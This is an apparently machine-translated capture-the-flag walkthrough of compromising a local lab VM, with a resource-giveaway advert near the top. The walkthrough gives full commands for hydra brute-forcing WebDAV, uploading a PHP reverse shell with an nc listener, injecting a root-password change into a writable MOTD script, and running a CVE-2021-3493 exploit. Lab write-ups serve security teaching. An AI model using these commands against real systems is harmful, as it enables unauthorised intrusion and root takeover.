当前位置：网站首页>Detailed explanation of the penetration of network security in the shooting range

Detailed explanation of the penetration of network security in the shooting range

2022-04-23 16:49:00 【InfoQ】

0x00 Environment configuration

Virtual Network Editor ：

Kali：

Drone aircraft ：

0x01 The host found / Port scanning

First, use the following command to find the target ip The address is 192.168.26.131

arp-scan -l

Then start using nmap Discover ports and services

nmap -sV -sC -p- 192.168.26.131

After scanning open ports and services , Found only open 22 Port and 80 port , visit 80 The port did not find any points to test , So I started using dirsearch Scan the directory .

【 One > All resources get < One 】
1、 Many out of print e-books that can't be bought 2、 Training materials inside the safety factory 3、 Complete kit 4、100 Share src Source code technical documentation 5、 Introduction to the basics of network security 、Linux、web Security 、 Video on attack and defense 6、 Emergency response notes 7、 Network Security Learning Route 8、ctf Flag race 9、WEB Safety introduction notes

0x02 information gathering

dirsearch --url http://192.168.26.131

After directory scanning , Found out webdav The path of , Visited a wave of , Found that you need to log in , Here is a brief talk about what is webdav：

0x03 Password dictionary customization

After several simple weak password attempts, I found that I couldn't , So I started using kali Use your own dictionary for brute force cracking , But I ran for a long time and failed , So I'm going to use kali Self contained dictionary generation tool cewl Generate a dictionary dedicated to this website for testing .

cewl http://192.168.26.131 -w 192.168.26.131dict.txt

0x04 hydra Code explosion

hydra -L 192.168.26.131dict.txt -P 192.168.26.131dict.txt 192.168.26.131 http-get /webdav -v

 Successfully exploded the account and password , Sure enough, the generated exclusive dictionary is better to use . Because we got webdav Relevant certification information of the service , So next I started using it directly kali Self contained webdav Testing tools davtest To test , See if you can send the file up , If you can , We can directly webshell To the server , In order to getshell Break through the border .

0x05 webdav Loophole

davtest -url http://192.168.26.131/webdav -auth yamdoot:Swarg

 From the picture above, we can know , We can establish a through the obtained information voucher DAV Connect , And you can create directories and upload files on the target , The only files uploaded to it are txt,php,html Three formats of files can be executed , So here we are getshell There is a way of thinking ,  Pass a rebound directly shell Of php file , then kali Listen to the local port , Then access this file , Trigger execution getshell.

cp /usr/share/webshells/php/php-reverse-shell.php . # take kali Self rebound shell Copy the file to the current directory 
vim php-reverse-shell.php # Edit this file , take ip Change it to kali Of ip  Port to kali The port of

![image.png](https://img-blog.csdnimg.cn/img_convert/13267318df81d6bde1c4be3097d6c1e3.png

davtest -url http://192.168.26.131/webdav -auth yamdoot:Swarg -uploadfile php-reverse-shell.php -uploadloc rev.php

 As you can see from the picture above , We have succeeded in rebounding shell The file was uploaded to the target plane , Next kali Listen to the local port , Then access this file , Trigger execution getshell.

nc -lnvp 4444 #kali monitor 4444 port

http://192.168.26.131/webdav/rev.php # Access to this link triggers execution shell Code for

python3 -c &quot;import pty;pty.spawn('/bin/bash')&quot; # Upgrade and optimize shell

0x06 MOTD Injection of power

Next, let's find some owners through the following command root Ordinary users or groups can perform Files that other users can write , This kind of permission promotion can help us realize this kind of file .

find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null
# Command interpretation ：
 Start from the root directory to find   file type   The owner is root  Ordinary users or groups can perform   Other users can write   If you find a qualified use  ls -l Command display   The error message is directed from null

First cat The first file searched , It's found that there are brainfuck Encrypted content , So try to decrypt .

Online decryption website ：http://bf.doleczek.pl/

chitragupt

The decryption result may be the password of a user , So according to the view /etc/passwd Users of file discovery , Try one by one .

When I try to switch to interno When users , The string obtained by using the secret is successful su here we are inferno On the user . It's done here. From www-data Permission promotion from permission to ordinary user permission .

And then we were in inferno The first... Was found in the user's home directory flag.

Now that we have obtained inferno User's password , I'll try to use ssh Log in to inferno On the user .

ssh [email protected]

Successfully logged in to inferno After the user, execute the following command again ：

find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null

I observed that except for the file we just found the password , The other documents are in /etc/update-motd.d/ Under this catalog ,motd yes message of the day The abbreviation of this sentence , We go through ssh The welcome and prompt messages you see after successful login are motd These stored in the directory sh What the script provides .

So now we know , When we go through ssh When the login is successful , these sh The script will start with root Permission to run, output those welcome messages, dates and so on , And our current user can read and write these files , Then there is the idea of raising rights , We can pass through these sh Write a modification in the script root User password command , So when we pass ssh The user logs in to inferno When I was on this account , Those of us motd Of sh The script will be written as root Execute with the user's permission , At this time, the modification we write root The command of user password will also be executed , Then we just need to switch to root The user can complete the right raising , With the idea in mind, let's start the operation .

vi /etc/update-motd.d/00-header # Edit this file 
echo 'root:123' | chpasswd # Add this line at the end of the file , This line means , Use chpasswd The order will root The user's password is changed to 123

Then save the changes , sign out ssh The connection of , And then reuse ssh Sign in , Trigger the execution of our modification root User's command .

When we see the welcome message after successful login ,root The user's password has been successfully changed by us to 123. Then it just needs su To root The user can successfully raise the right .

0x07 CVE-2021-3493 Raise the right :

stay ssh In the welcome message after successful login , I see. The version of the target is Ubuntu18.04, I'm familiar with this version , I've used the right raising vulnerability of this version before , So I won't repeat it here . First the exp Download to kali Local .

scp exploit.c [email protected]:/home/inferno # take exp Upload to the target

gcc exploit.c -o exploit # Try to compile exploit.c  And name the compiled file exploit

It is found that the target cannot run gcc, So here we are kali First compile , Then transfer it to the target plane .

chmod +x exploit # to exploit Grant execution permission 
./exploit # perform exp

You can see through CVE-2021-3493 Also obtained root jurisdiction

版权声明
本文为[InfoQ]所创，转载请带上原文链接，感谢
https://yzsam.com/2022/04/202204231645272170.html